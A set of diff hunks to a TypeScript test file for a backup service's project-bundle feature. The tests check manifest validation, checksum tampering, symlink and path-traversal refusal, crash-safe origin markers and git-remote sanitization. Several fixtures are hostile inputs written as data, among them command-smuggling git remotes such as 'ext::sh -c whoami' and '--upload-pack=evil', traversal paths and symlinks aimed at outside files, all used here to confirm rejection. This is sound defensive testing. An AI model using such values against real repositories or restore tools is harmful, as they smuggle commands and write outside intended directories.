     expect((error as Error).message).toContain("memory directory");
   });
 
+  it("rejects an over-long file list before validating its entries", async () => {
+    const entry = entryFor("/home/dev/src/alpha");
+    await rewriteBundleManifest(managedDir, {
+      schemaVersion: 1,
+      projects: [entry],
+      files: Array.from({ length: MAX_BACKUP_FILE_COUNT + 1 }, (_, index) => ({
+        path: `memory/project/${entry.memoryDir}/n${index}.md`,
+        sha256: "0".repeat(64),
+      })),
+    });
+    const error = await captureRejection(readProjectBundle(managedDir));
+    expect((error as { code?: string }).code).toBe("INVALID_BACKUP");
+    expect((error as Error).message).toContain(`${MAX_BACKUP_FILE_COUNT}`);
+  });
+
   it("rejects an oversized bundle file path before it reaches the filesystem", async () => {
     const entry = entryFor("/home/dev/src/alpha");
     await rewriteBundleManifest(managedDir, {

--- a/src/node/services/backup/payload.test.ts
+++ b/src/node/services/backup/payload.test.ts
@@ -3637,7 +3637,7 @@ describe("project bundle", () => {
     );
 
     const exported = await collectProjectBundle(muxRoot, [entry], {
-      skipOversizedMemoryFiles: true,
+      portableMemoryOnly: true,
     });
     expect(exported.files.map((file) => file.path)).toEqual([
       `memory/project/${entry.memoryDir}/small.md`,
@@ -3645,6 +3645,28 @@ describe("project bundle", () => {
     // Only the export path skips; a snapshot collection still surfaces the problem.
     const error = await captureRejection(collectProjectBundle(muxRoot, [entry]));
     expect((error as Error).message).toContain("corrupt.md");
+  });
+
+  it("caps exported memory files per project at the memory scope limit", async () => {
+    const entry = entryFor("/home/dev/src/alpha");
+    for (let index = 0; index <= MEMORY_MAX_FILES_PER_SCOPE; index += 1) {
+      await writeFixtureFile(muxRoot, `memory/project/${entry.memoryDir}/n${index}.md`, "x\n");
+    }
+
+    // Deterministic: the sorted prefix, so repeated exports agree and the bundle stays
+    // importable into a fresh target.
+    const exported = await collectProjectBundle(muxRoot, [entry], { portableMemoryOnly: true });
+    expect(exported.files).toHaveLength(MEMORY_MAX_FILES_PER_SCOPE);
+    const snapshot = await collectProjectBundle(muxRoot, [entry]);
+    expect(snapshot.files).toHaveLength(MEMORY_MAX_FILES_PER_SCOPE + 1);
+  });
+
+  it("refuses to write a bundle whose generated manifest no reader would accept", async () => {
+    const longPath = `/home/${"p".repeat(1024)}`;
+    const bundle = await collectProjectBundle(muxRoot, [entryFor(longPath, "alpha")]);
+    const error = await captureRejection(writeBundleTo(managedDir, bundle));
+    expect((error as Error).message).toContain("Cannot back up the project list");
+    expect(await projectBundleExists(managedDir)).toBe(false);
   });
 
   it("skips memory files past the memory read limit only when exporting", async () => {
@@ -3656,7 +3678,7 @@ describe("project bundle", () => {
     );
 
     const exported = await collectProjectBundle(muxRoot, [entry], {
-      skipOversizedMemoryFiles: true,
+      portableMemoryOnly: true,
     });
     expect(exported.files.map((file) => file.path)).toEqual([
       `memory/project/${entry.memoryDir}/small.md`,

--- a/src/node/services/backup/payload.test.ts
+++ b/src/node/services/backup/payload.test.ts
@@ -3817,6 +3817,37 @@ describe("project bundle", () => {
     expect(leftovers).toEqual([]);
   });
 
+  it("keeps the previous association when a re-import was interrupted between its two writes", async () => {
+    const source = "/home/dev/src/alpha";
+    const b = "/home/other/b";
+    const d = "/home/other/d";
+    const registered = new Map([b, d].map((project) => [project, projectMemoryDirName(project)]));
+    await writeProjectMemoryOrigin(muxRoot, projectMemoryDirName(b), source);
+    // A crash after the source's record was replaced but before D's record landed: the
+    // source names D (and B as where it came from), D's record does not exist, B's still
+    // names the source.
+    await fs.writeFile(
+      originMarkerPath(source),
+      JSON.stringify({
+        sourcePath: source,
+        memoryDir: projectMemoryDirName(d),
+        previousMemoryDir: projectMemoryDirName(b),
+      }),
+      "utf-8"
+    );
+
+    expect((await readProjectMemoryOrigins(muxRoot, registered, [source])).get(source)).toEqual({
+      projectPath: b,
+      memoryDir: projectMemoryDirName(b),
+    });
+    // Completing the pair (the retry) moves the association to D.
+    await writeProjectMemoryOrigin(muxRoot, projectMemoryDirName(d), source);
+    expect((await readProjectMemoryOrigins(muxRoot, registered, [source])).get(source)).toEqual({
+      projectPath: d,
+      memoryDir: projectMemoryDirName(d),
+    });
+  });
+
   it("ignores markers that are broken, mis-named, or name an unregistered project", async () => {
     const registeredProject = "/home/other/a";
     const registered = new Map([[registeredProject, projectMemoryDirName(registeredProject)]]);

--- a/src/node/services/backup/payload.test.ts
+++ b/src/node/services/backup/payload.test.ts
@@ -3841,6 +3841,15 @@ describe("project bundle", () => {
     expect(await readProjectBundle(managedDir)).toBeNull();
   });
 
+  it("treats a symlinked sidecar directory as absent without traversing it", async () => {
+    const outsideDir = path.join(tempDir, "outside-bundle");
+    await fs.mkdir(outsideDir, { recursive: true });
+    await fs.writeFile(path.join(outsideDir, "manifest.json"), "{}", "utf-8");
+    await fs.symlink(outsideDir, path.join(managedDir, PROJECT_BUNDLE_DIR), "dir");
+    expect(await projectBundleExists(managedDir)).toBe(false);
+    expect(await readProjectBundle(managedDir)).toBeNull();
+  });
+
   it("rejects unsafe memory directory segments", async () => {
     for (const memoryDir of ["..", "evil/../../up", "nul", ".hidden-abcdef123456"]) {
       await rewriteBundleManifest(managedDir, {

--- a/src/node/services/backup/payload.test.ts
+++ b/src/node/services/backup/payload.test.ts
@@ -3733,6 +3733,40 @@ describe("project bundle", () => {
     ]);
   });
 
+  it("refuses an origin marker behind a symlinked directory or marker", async () => {
+    const localProject = "/home/other/a";
+    const localDir = projectMemoryDirName(localProject);
+    const outside = path.join(tempDir, "outside-origins");
+    await fs.mkdir(outside, { recursive: true });
+    const originsDir = path.join(muxRoot, "memory", ".backup-origins");
+    await fs.mkdir(path.dirname(originsDir), { recursive: true });
+
+    // A copied or corrupted Xum home left `.backup-origins` itself as a symlink.
+    await fs.symlink(outside, originsDir, "dir");
+    const viaDir = await captureRejection(
+      writeProjectMemoryOrigin(muxRoot, localDir, "/home/dev/src/alpha")
+    );
+    expect((viaDir as Error).message).toContain("symlink");
+    expect(await fs.readdir(outside)).toEqual([]);
+
+    // The directory is real but the marker is a link to a file outside the memory tree.
+    await fs.unlink(originsDir);
+    await fs.mkdir(originsDir);
+    const victim = path.join(outside, "victim.json");
+    await fs.writeFile(victim, JSON.stringify({ sourcePath: "/home/dev/src/alpha" }), "utf-8");
+    await fs.symlink(victim, path.join(originsDir, `${localDir}.json`));
+    const viaMarker = await captureRejection(
+      writeProjectMemoryOrigin(muxRoot, localDir, "/home/dev/src/planted")
+    );
+    expect((viaMarker as Error).message).toContain("symlink");
+    expect(JSON.parse(await fs.readFile(victim, "utf-8"))).toEqual({
+      sourcePath: "/home/dev/src/alpha",
+    });
+    // Nor is the linked file's content trusted as this project's origin.
+    const origins = await readProjectMemoryOrigins(muxRoot, new Map([[localProject, localDir]]));
+    expect(origins.size).toBe(0);
+  });
+
   it("skips an oversized memory file without charging the backup budget", async () => {
     const entry = entryFor("/home/dev/src/alpha");
     await writeFixtureFile(muxRoot, `memory/project/${entry.memoryDir}/small.md`, "fine\n");

--- a/src/node/services/backup/payload.test.ts
+++ b/src/node/services/backup/payload.test.ts
@@ -3786,6 +3786,37 @@ describe("project bundle", () => {
     );
   });
 
+  it("puts the source's previous record back when the project-side write fails", async () => {
+    const source = "/home/dev/src/alpha";
+    const fresh = "/home/dev/src/epsilon";
+    const b = "/home/other/b";
+    const d = "/home/other/d";
+    const registered = new Map([b, d].map((project) => [project, projectMemoryDirName(project)]));
+    await writeProjectMemoryOrigin(muxRoot, projectMemoryDirName(b), source);
+    // A directory squats on D's record, so only the second of the two writes can fail.
+    await fs.mkdir(originTargetPath(projectMemoryDirName(d)), { recursive: true });
+
+    // Moving the source from B to D fails halfway: the source's record had already been
+    // replaced, and without being put back neither A→B nor A→D would have two agreeing
+    // halves — a failed import would have cost the project its association.
+    const moved = await captureRejection(
+      writeProjectMemoryOrigin(muxRoot, projectMemoryDirName(d), source)
+    );
+    expect(moved).toBeInstanceOf(Error);
+    expect((await readProjectMemoryOrigins(muxRoot, registered, [source])).get(source)).toEqual({
+      projectPath: b,
+      memoryDir: projectMemoryDirName(b),
+    });
+
+    // A first-ever association that fails the same way leaves no half record behind.
+    await captureRejection(writeProjectMemoryOrigin(muxRoot, projectMemoryDirName(d), fresh));
+    expect(await fs.lstat(originMarkerPath(fresh)).catch(() => null)).toBeNull();
+    const leftovers = (await fs.readdir(path.join(muxRoot, "memory", ".backup-origins"))).filter(
+      (name) => name.endsWith(".tmp")
+    );
+    expect(leftovers).toEqual([]);
+  });
+
   it("ignores markers that are broken, mis-named, or name an unregistered project", async () => {
     const registeredProject = "/home/other/a";
     const registered = new Map([[registeredProject, projectMemoryDirName(registeredProject)]]);

--- a/src/node/services/backup/payload.test.ts
+++ b/src/node/services/backup/payload.test.ts
@@ -33,7 +33,6 @@ import {
   planRestoreWrites,
   projectBundleExists,
   projectImportToken,
-  projectMemoryRelPath,
   readProjectBundle,
   rekeyProjectMemoryPath,
   serializeBackupPreferences,
@@ -4001,12 +4000,6 @@ describe("project bundle", () => {
     } finally {
       mkdir.mockRestore();
     }
-  });
-
-  it("maps bundle paths to scope-relative memory paths", () => {
-    expect(projectMemoryRelPath("memory/project/alpha-123456789abc/deep/notes.md")).toBe(
-      "deep/notes.md"
-    );
   });
 
   it("refuses memory writes outside the project memory tree", async () => {

--- a/src/node/services/backup/payload.test.ts
+++ b/src/node/services/backup/payload.test.ts
@@ -18,22 +18,38 @@ import {
   MAX_BACKUP_MCP_REDACTION_SEGMENTS,
   MAX_BACKUP_PATH_DEPTH,
   MAX_BACKUP_TOTAL_BYTES,
+  PROJECT_BUNDLE_DIR,
   REDACTED_BACKUP_VALUE,
   backupCommandApprovalToken,
   backupSecretApprovalDigest,
   collectAllowlistedFiles,
   collectMcpCommandApprovals,
+  collectProjectBundle,
   createBackupPayload,
   localOnlyPayloadFiles,
   mergeBackupPreferences,
+  planProjectBundleRestore,
   planRestoreWrites,
+  projectBundleExists,
+  projectImportToken,
+  readProjectBundle,
+  rekeyProjectMemoryPath,
   serializeBackupPreferences,
   readBackupPayload,
   resolveRestoredContent,
   restoreBackupPayload,
   scanBackupFilesForSecrets,
   writeBackupPayload,
+  writeProjectBundle,
+  writeProjectMemoryFiles,
+  type BackupProjectBundle,
 } from "./payload";
+import { projectMemoryDirName, projectPathHashSuffix } from "@/node/services/memoryService";
+import {
+  MAX_BACKUP_PROJECT_ENTRIES,
+  sanitizeBackupGitRemote,
+  type BackupProjectBundleEntry,
+} from "@/common/config/schemas/settingsBackup";
 import { captureRejection, writeFixtureFile } from "./testHelpers";
 
 async function isExecutable(filePath: string): Promise<boolean> {
@@ -3468,5 +3484,380 @@ describe("backup payload", () => {
     };
     expect(restoredMcp.servers.api.url).toBe("https://backup.example.com/mcp?mode=backup");
     expect(restoredMcp.servers.api.headers).toBeUndefined();
+  });
+});
+
+describe("project bundle", () => {
+  let tempDir: string;
+  let muxRoot: string;
+  let managedDir: string;
+
+  function entryFor(projectPath: string, name?: string): BackupProjectBundleEntry {
+    return {
+      path: projectPath,
+      name: name ?? path.basename(projectPath),
+      memoryDir: projectMemoryDirName(projectPath),
+    };
+  }
+
+  async function writeBundleTo(destination: string, bundle: BackupProjectBundle): Promise<void> {
+    await writeProjectBundle(path.join(destination, PROJECT_BUNDLE_DIR), bundle);
+  }
+
+  async function rewriteBundleManifest(destination: string, manifest: unknown): Promise<void> {
+    await fs.mkdir(path.join(destination, PROJECT_BUNDLE_DIR), { recursive: true });
+    await fs.writeFile(
+      path.join(destination, PROJECT_BUNDLE_DIR, "manifest.json"),
+      JSON.stringify(manifest, null, 2),
+      "utf-8"
+    );
+  }
+
+  beforeEach(async () => {
+    tempDir = await fs.mkdtemp(path.join(os.tmpdir(), "mux-project-bundle-"));
+    muxRoot = path.join(tempDir, "mux-root");
+    managedDir = path.join(tempDir, "managed");
+    await fs.mkdir(muxRoot, { recursive: true });
+    await fs.mkdir(managedDir, { recursive: true });
+  });
+
+  afterEach(async () => {
+    await fs.rm(tempDir, { recursive: true, force: true });
+  });
+
+  it("round-trips project entries and memory files, keeping zero-memory projects as entries", async () => {
+    const withMemory = entryFor("/home/dev/src/alpha");
+    const withoutMemory = entryFor("/home/dev/src/beta");
+    await writeFixtureFile(
+      muxRoot,
+      `memory/project/${withMemory.memoryDir}/notes.md`,
+      "alpha notes\n"
+    );
+
+    const bundle = await collectProjectBundle(muxRoot, [withoutMemory, withMemory]);
+    expect(bundle.manifest.projects.map((entry) => entry.path)).toEqual([
+      "/home/dev/src/alpha",
+      "/home/dev/src/beta",
+    ]);
+    expect(bundle.manifest.files.map((file) => file.path)).toEqual([
+      `memory/project/${withMemory.memoryDir}/notes.md`,
+    ]);
+
+    await writeBundleTo(managedDir, bundle);
+    expect(await projectBundleExists(managedDir)).toBe(true);
+    const read = await readProjectBundle(managedDir);
+    expect(read).not.toBeNull();
+    expect(read?.manifest.projects).toEqual(bundle.manifest.projects);
+    expect(read?.files[0]?.content.toString("utf-8")).toBe("alpha notes\n");
+  });
+
+  it("returns null when the backup carries no bundle", async () => {
+    expect(await readProjectBundle(managedDir)).toBeNull();
+    expect(await projectBundleExists(managedDir)).toBe(false);
+  });
+
+  it("rejects more project entries than the cap", async () => {
+    const entries = Array.from({ length: MAX_BACKUP_PROJECT_ENTRIES + 1 }, (_, index) =>
+      entryFor(`/home/dev/src/project-${index}`)
+    );
+    const error = await captureRejection(collectProjectBundle(muxRoot, entries));
+    expect((error as Error).message).toContain(`${MAX_BACKUP_PROJECT_ENTRIES}`);
+  });
+
+  it("rejects a bundle file whose checksum does not match", async () => {
+    const entry = entryFor("/home/dev/src/alpha");
+    await writeFixtureFile(muxRoot, `memory/project/${entry.memoryDir}/notes.md`, "original\n");
+    const bundle = await collectProjectBundle(muxRoot, [entry]);
+    await writeBundleTo(managedDir, bundle);
+
+    await fs.writeFile(
+      path.join(managedDir, PROJECT_BUNDLE_DIR, "memory", "project", entry.memoryDir, "notes.md"),
+      "tampered\n",
+      "utf-8"
+    );
+
+    const error = await captureRejection(readProjectBundle(managedDir));
+    expect((error as { code?: string }).code).toBe("INVALID_BACKUP");
+    expect((error as Error).message).toContain("checksum");
+  });
+
+  it("rejects a recorded memory directory whose hash suffix does not match its path", async () => {
+    await rewriteBundleManifest(managedDir, {
+      schemaVersion: 1,
+      projects: [
+        {
+          path: "/home/dev/src/alpha",
+          name: "alpha",
+          // A valid-looking dir name recorded for a DIFFERENT project path.
+          memoryDir: projectMemoryDirName("/home/dev/src/other"),
+        },
+      ],
+      files: [],
+    });
+    const error = await captureRejection(readProjectBundle(managedDir));
+    expect((error as { code?: string }).code).toBe("INVALID_BACKUP");
+    expect((error as Error).message).toContain("memory directory");
+  });
+
+  it("rejects unsafe memory directory segments", async () => {
+    for (const memoryDir of ["..", "evil/../../up", "nul", ".hidden-abcdef123456"]) {
+      await rewriteBundleManifest(managedDir, {
+        schemaVersion: 1,
+        projects: [{ path: "/home/dev/src/alpha", name: "alpha", memoryDir }],
+        files: [],
+      });
+      const error = await captureRejection(readProjectBundle(managedDir));
+      expect((error as { code?: string }).code).toBe("INVALID_BACKUP");
+    }
+  });
+
+  it("keeps a foreign-OS entry with a correct hash suffix as an import candidate", async () => {
+    // A Windows export records a dir name whose sanitized basename this POSIX host would
+    // never recompute, while the pure string hash still matches the recorded path.
+    const windowsPath = "C:\\Users\\dev\\src\\gamma";
+    const recordedDir = `gamma-${projectPathHashSuffix(windowsPath)}`;
+    await rewriteBundleManifest(managedDir, {
+      schemaVersion: 1,
+      projects: [{ path: windowsPath, name: "gamma", memoryDir: recordedDir }],
+      files: [],
+    });
+
+    const bundle = await readProjectBundle(managedDir);
+    expect(bundle).not.toBeNull();
+    // Even a registered project at that exact path with a different local dir name is not
+    // auto-restored: the entry downgrades to an explicit import candidate.
+    const registered = new Map([[windowsPath, projectMemoryDirName(windowsPath)]]);
+    expect(projectMemoryDirName(windowsPath)).not.toBe(recordedDir);
+    const plan = planProjectBundleRestore(bundle!, registered);
+    expect(plan.matched).toEqual([]);
+    expect(plan.imports.map((candidate) => candidate.entry.path)).toEqual([windowsPath]);
+  });
+
+  it("rejects bundle files outside their entry's memory directory or the bundle allowlist", async () => {
+    const entry = entryFor("/home/dev/src/alpha");
+    const sha = createHash("sha256").update(Buffer.from("x", "utf-8")).digest("hex");
+    for (const filePath of [
+      "skills/evil.md",
+      "memory/global/evil.md",
+      `memory/project/${projectMemoryDirName("/home/dev/src/unlisted")}/notes.md`,
+      "memory/project/../evil.md",
+      `memory/project/${entry.memoryDir}/.env`,
+      `memory/project/${entry.memoryDir}/memory-meta.json`,
+      `memory/project/${entry.memoryDir}`,
+    ]) {
+      await rewriteBundleManifest(managedDir, {
+        schemaVersion: 1,
+        projects: [{ path: entry.path, name: entry.name, memoryDir: entry.memoryDir }],
+        files: [{ path: filePath, sha256: sha }],
+      });
+      const error = await captureRejection(readProjectBundle(managedDir));
+      expect((error as { code?: string }).code).toBe("INVALID_BACKUP");
+    }
+  });
+
+  it("drops non-portable git remotes instead of failing the bundle", async () => {
+    const entry = entryFor("/home/dev/src/alpha");
+    await rewriteBundleManifest(managedDir, {
+      schemaVersion: 1,
+      projects: [
+        { ...entry, gitRemote: "ext::sh -c whoami" },
+        { ...entryFor("/home/dev/src/beta"), gitRemote: "git@github.com:dev/beta.git" },
+      ],
+      files: [],
+    });
+    const bundle = await readProjectBundle(managedDir);
+    expect(bundle?.manifest.projects[0]?.gitRemote).toBeUndefined();
+    expect(bundle?.manifest.projects[1]?.gitRemote).toBe("git@github.com:dev/beta.git");
+  });
+
+  it("keeps the core manifest free of bundle paths so an old reader ignores the sidecar", async () => {
+    await writeFixtureFile(muxRoot, "AGENTS.md", "instructions\n");
+    const entry = entryFor("/home/dev/src/alpha");
+    await writeFixtureFile(muxRoot, `memory/project/${entry.memoryDir}/notes.md`, "notes\n");
+
+    const payload = await createBackupPayload({
+      muxRoot,
+      muxVersion: "test",
+      sourceLabel: "test",
+    });
+    await writeBackupPayload(managedDir, payload);
+    await writeBundleTo(managedDir, await collectProjectBundle(muxRoot, [entry]));
+
+    const coreManifest = JSON.parse(
+      await fs.readFile(path.join(managedDir, "manifest.json"), "utf-8")
+    ) as { files: Array<{ path: string }> };
+    expect(
+      coreManifest.files.some(
+        (file) => file.path.startsWith(PROJECT_BUNDLE_DIR) || file.path.startsWith("memory/project")
+      )
+    ).toBe(false);
+
+    // The manifest-driven core reader never touches the sidecar (old-build restore).
+    const read = await readBackupPayload(managedDir);
+    expect(read.files.some((file) => file.path.startsWith("memory/project"))).toBe(false);
+  });
+
+  it("still rejects a core manifest that lists bundle paths", async () => {
+    await writeFixtureFile(muxRoot, "AGENTS.md", "instructions\n");
+    const payload = await createBackupPayload({
+      muxRoot,
+      muxVersion: "test",
+      sourceLabel: "test",
+    });
+    await writeBackupPayload(managedDir, payload);
+
+    const manifestPath = path.join(managedDir, "manifest.json");
+    const manifest = JSON.parse(await fs.readFile(manifestPath, "utf-8")) as {
+      files: Array<{ path: string; sha256: string }>;
+    };
+    const content = "smuggled\n";
+    await writeFixtureFile(managedDir, "project-bundle/memory/project/x-abc/evil.md", content);
+    manifest.files.push({
+      path: "project-bundle/memory/project/x-abc/evil.md",
+      sha256: sha256Hex(content),
+    });
+    await fs.writeFile(manifestPath, JSON.stringify(manifest), "utf-8");
+
+    const error = await captureRejection(readBackupPayload(managedDir));
+    expect((error as { code?: string }).code).toBe("INVALID_BACKUP");
+  });
+
+  it("binds the import token to entry metadata and file content", async () => {
+    const entry = entryFor("/home/dev/src/alpha");
+    await writeFixtureFile(muxRoot, `memory/project/${entry.memoryDir}/notes.md`, "v1\n");
+    const bundle = await collectProjectBundle(muxRoot, [entry]);
+    const token = projectImportToken(bundle.manifest.projects[0], bundle.files);
+    // Deterministic across recomputation.
+    expect(projectImportToken(bundle.manifest.projects[0], bundle.files)).toBe(token);
+
+    await writeFixtureFile(muxRoot, `memory/project/${entry.memoryDir}/notes.md`, "v2\n");
+    const changed = await collectProjectBundle(muxRoot, [entry]);
+    expect(projectImportToken(changed.manifest.projects[0], changed.files)).not.toBe(token);
+
+    const renamed = { ...bundle.manifest.projects[0], name: "other-name" };
+    expect(projectImportToken(renamed, bundle.files)).not.toBe(token);
+  });
+
+  it("partitions matched and import entries against the registered project map", async () => {
+    const matched = entryFor("/home/dev/src/alpha");
+    const unmatched = entryFor("/home/dev/src/beta");
+    await writeFixtureFile(muxRoot, `memory/project/${matched.memoryDir}/notes.md`, "a\n");
+    await writeFixtureFile(muxRoot, `memory/project/${unmatched.memoryDir}/notes.md`, "b\n");
+    const bundle = await collectProjectBundle(muxRoot, [matched, unmatched]);
+
+    const plan = planProjectBundleRestore(
+      bundle,
+      new Map([[matched.path, projectMemoryDirName(matched.path)]])
+    );
+    expect(plan.matched.map((item) => item.entry.path)).toEqual([matched.path]);
+    expect(plan.imports.map((item) => item.entry.path)).toEqual([unmatched.path]);
+    expect(plan.imports[0]?.files.map((file) => file.path)).toEqual([
+      `memory/project/${unmatched.memoryDir}/notes.md`,
+    ]);
+  });
+
+  it("re-keys bundle paths to the locally computed target directory", () => {
+    expect(
+      rekeyProjectMemoryPath("memory/project/alpha-123456789abc/deep/notes.md", "beta-fed")
+    ).toBe("memory/project/beta-fed/deep/notes.md");
+  });
+
+  it("writes project memory add-only, skipping conflicts and identical files", async () => {
+    const targetDir = projectMemoryDirName("/home/dev/target");
+    await writeFixtureFile(muxRoot, `memory/project/${targetDir}/existing.md`, "local version\n");
+    await writeFixtureFile(muxRoot, `memory/project/${targetDir}/same.md`, "identical\n");
+
+    const result = await writeProjectMemoryFiles(
+      muxRoot,
+      [
+        {
+          path: `memory/project/${targetDir}/existing.md`,
+          content: Buffer.from("backup version\n"),
+        },
+        { path: `memory/project/${targetDir}/same.md`, content: Buffer.from("identical\n") },
+        { path: `memory/project/${targetDir}/new.md`, content: Buffer.from("added\n") },
+      ],
+      { addOnly: true }
+    );
+
+    expect(result.written).toEqual([`memory/project/${targetDir}/new.md`]);
+    expect(result.skipped).toEqual([`memory/project/${targetDir}/existing.md`]);
+    expect(
+      await fs.readFile(path.join(muxRoot, "memory", "project", targetDir, "existing.md"), "utf-8")
+    ).toBe("local version\n");
+    expect(
+      await fs.readFile(path.join(muxRoot, "memory", "project", targetDir, "new.md"), "utf-8")
+    ).toBe("added\n");
+  });
+
+  it("overwrites in matched mode but reports only files that actually changed", async () => {
+    const targetDir = projectMemoryDirName("/home/dev/target");
+    await writeFixtureFile(muxRoot, `memory/project/${targetDir}/existing.md`, "local version\n");
+    await writeFixtureFile(muxRoot, `memory/project/${targetDir}/same.md`, "identical\n");
+
+    const result = await writeProjectMemoryFiles(
+      muxRoot,
+      [
+        {
+          path: `memory/project/${targetDir}/existing.md`,
+          content: Buffer.from("backup version\n"),
+        },
+        { path: `memory/project/${targetDir}/same.md`, content: Buffer.from("identical\n") },
+      ],
+      { addOnly: false }
+    );
+
+    expect(result.written).toEqual([`memory/project/${targetDir}/existing.md`]);
+    expect(result.skipped).toEqual([]);
+    expect(
+      await fs.readFile(path.join(muxRoot, "memory", "project", targetDir, "existing.md"), "utf-8")
+    ).toBe("backup version\n");
+  });
+
+  it("refuses memory writes outside the project memory tree", async () => {
+    for (const filePath of ["memory/project/../global/evil.md", "skills/evil.md"]) {
+      const error = await captureRejection(
+        writeProjectMemoryFiles(muxRoot, [{ path: filePath, content: Buffer.from("x") }], {
+          addOnly: true,
+        })
+      );
+      expect((error as Error).message).toContain("disallowed path");
+    }
+  });
+
+  it("treats bundle memory files as recursively collected in the secret scan", () => {
+    const flagged = scanBackupFilesForSecrets([
+      { path: "memory/project/alpha-123456789abc/data.bin", content: Buffer.from("binary") },
+      { path: "memory/project/alpha-123456789abc/notes.md", content: Buffer.from("plain notes") },
+    ]);
+    expect(flagged).toEqual(["memory/project/alpha-123456789abc/data.bin"]);
+  });
+});
+
+describe("sanitizeBackupGitRemote", () => {
+  it("keeps plain https, ssh, and scp-like remotes", () => {
+    expect(sanitizeBackupGitRemote("https://github.com/dev/repo.git")).toBe(
+      "https://github.com/dev/repo.git"
+    );
+    expect(sanitizeBackupGitRemote("ssh://git@github.com/dev/repo.git")).toBe(
+      "ssh://git@github.com/dev/repo.git"
+    );
+    expect(sanitizeBackupGitRemote("git@github.com:dev/repo.git")).toBe(
+      "git@github.com:dev/repo.git"
+    );
+  });
+
+  it("drops credentialed, executable, and local shapes", () => {
+    for (const remote of [
+      "https://user:secret@github.com/dev/repo.git",
+      "ext::sh -c whoami",
+      "file:///tmp/repo",
+      "/tmp/repo",
+      "../relative/repo",
+      "git@github.com:dev/repo.git --upload-pack=evil",
+      "https://github.com/dev/repo.git?token=abc",
+    ]) {
+      expect(sanitizeBackupGitRemote(remote)).toBeUndefined();
+    }
   });
 });

--- a/src/node/services/backup/payload.test.ts
+++ b/src/node/services/backup/payload.test.ts
@@ -3712,26 +3712,51 @@ describe("project bundle", () => {
     expect(plan.imports.map((item) => item.entry.path)).toEqual([sourceA.path]);
   });
 
-  it("ignores origin markers that are unreadable or claim a source twice", async () => {
+  it("keeps only the newest claim on a source when writing an origin marker", async () => {
+    const source = "/home/dev/src/alpha";
+    const b = "/home/other/b";
+    const c = "/home/other/c";
+    // Source imported to B; B unregistered; source imported again to C; B re-registered.
+    await writeProjectMemoryOrigin(muxRoot, projectMemoryDirName(b), source);
+    await writeProjectMemoryOrigin(muxRoot, projectMemoryDirName(c), source);
+    const registered = new Map([b, c].map((project) => [project, projectMemoryDirName(project)]));
+
+    // B's stale marker was removed when C claimed the source, so re-registering B cannot
+    // revive the older association or make the source ambiguous.
+    expect(
+      await fs
+        .lstat(path.join(muxRoot, "memory", ".backup-origins", `${projectMemoryDirName(b)}.json`))
+        .catch(() => null)
+    ).toBeNull();
+    expect([...(await readProjectMemoryOrigins(muxRoot, registered)).entries()]).toEqual([
+      [source, { projectPath: c, memoryDir: projectMemoryDirName(c) }],
+    ]);
+  });
+
+  it("leaves a source claimed by two registered projects unmatched and ignores broken markers", async () => {
     const first = "/home/other/a";
     const second = "/home/other/b";
     const broken = "/home/other/c";
     const registered = new Map(
       [first, second, broken].map((project) => [project, projectMemoryDirName(project)])
     );
-    await writeProjectMemoryOrigin(muxRoot, projectMemoryDirName(first), "/home/dev/src/alpha");
-    await writeProjectMemoryOrigin(muxRoot, projectMemoryDirName(second), "/home/dev/src/alpha");
+    // Hand-placed (a copied home): the writer would never leave two claims behind.
+    for (const project of [first, second]) {
+      await writeFixtureFile(
+        muxRoot,
+        `memory/.backup-origins/${projectMemoryDirName(project)}.json`,
+        JSON.stringify({ sourcePath: "/home/dev/src/alpha" })
+      );
+    }
     await writeFixtureFile(
       muxRoot,
       `memory/.backup-origins/${projectMemoryDirName(broken)}.json`,
       "{ not json"
     );
 
-    const origins = await readProjectMemoryOrigins(muxRoot, registered);
-    // Deterministic: the first project in path order keeps the source.
-    expect([...origins.entries()]).toEqual([
-      ["/home/dev/src/alpha", { projectPath: first, memoryDir: projectMemoryDirName(first) }],
-    ]);
+    // Ambiguous: neither project is matched, so a restore re-offers the source as an import
+    // instead of overwriting whichever project happens to sort first.
+    expect((await readProjectMemoryOrigins(muxRoot, registered)).size).toBe(0);
   });
 
   it("refuses an origin marker behind a symlinked directory or marker", async () => {
@@ -3867,22 +3892,47 @@ describe("project bundle", () => {
     expect((hidden as Error).message).toContain("disallowed path");
   });
 
-  it("treats a symlinked sidecar manifest as absent without following it", async () => {
+  it("refuses a symlinked sidecar manifest as an invalid bundle without following it", async () => {
     await fs.mkdir(path.join(managedDir, PROJECT_BUNDLE_DIR), { recursive: true });
     const outside = path.join(tempDir, "outside-manifest.json");
-    await fs.writeFile(outside, "{}", "utf-8");
+    // Would parse as a manifest if followed; the refusal must come from the link itself.
+    await fs.writeFile(
+      outside,
+      JSON.stringify({ schemaVersion: 1, projects: [], files: [] }),
+      "utf-8"
+    );
     await fs.symlink(outside, path.join(managedDir, PROJECT_BUNDLE_DIR, "manifest.json"));
-    expect(await projectBundleExists(managedDir)).toBe(false);
-    expect(await readProjectBundle(managedDir)).toBeNull();
+    expect(await projectBundleExists(managedDir)).toBe(true);
+    const error = await captureRejection(readProjectBundle(managedDir));
+    expect((error as { code?: string }).code).toBe("INVALID_BACKUP");
+    expect((error as Error).message).toContain("symlink");
   });
 
-  it("treats a symlinked sidecar directory as absent without traversing it", async () => {
+  it("refuses a symlinked sidecar directory as an invalid bundle without traversing it", async () => {
     const outsideDir = path.join(tempDir, "outside-bundle");
     await fs.mkdir(outsideDir, { recursive: true });
-    await fs.writeFile(path.join(outsideDir, "manifest.json"), "{}", "utf-8");
+    await fs.writeFile(
+      path.join(outsideDir, "manifest.json"),
+      JSON.stringify({ schemaVersion: 1, projects: [], files: [] }),
+      "utf-8"
+    );
     await fs.symlink(outsideDir, path.join(managedDir, PROJECT_BUNDLE_DIR), "dir");
-    expect(await projectBundleExists(managedDir)).toBe(false);
-    expect(await readProjectBundle(managedDir)).toBeNull();
+    // Present — so a toggle-off restore reports it as skipped — but never read as a bundle:
+    // absent would let a restore with projects on apply the core settings while silently
+    // omitting every backed-up project.
+    expect(await projectBundleExists(managedDir)).toBe(true);
+    const error = await captureRejection(readProjectBundle(managedDir));
+    expect((error as { code?: string }).code).toBe("INVALID_BACKUP");
+    expect((error as Error).message).toContain("symlink");
+  });
+
+  it("refuses a sidecar directory without a manifest as an invalid bundle", async () => {
+    await fs.mkdir(path.join(managedDir, PROJECT_BUNDLE_DIR, "memory", "project"), {
+      recursive: true,
+    });
+    const error = await captureRejection(readProjectBundle(managedDir));
+    expect((error as { code?: string }).code).toBe("INVALID_BACKUP");
+    expect((error as Error).message).toContain("no manifest");
   });
 
   it("rejects unsafe memory directory segments", async () => {

--- a/src/node/services/backup/payload.test.ts
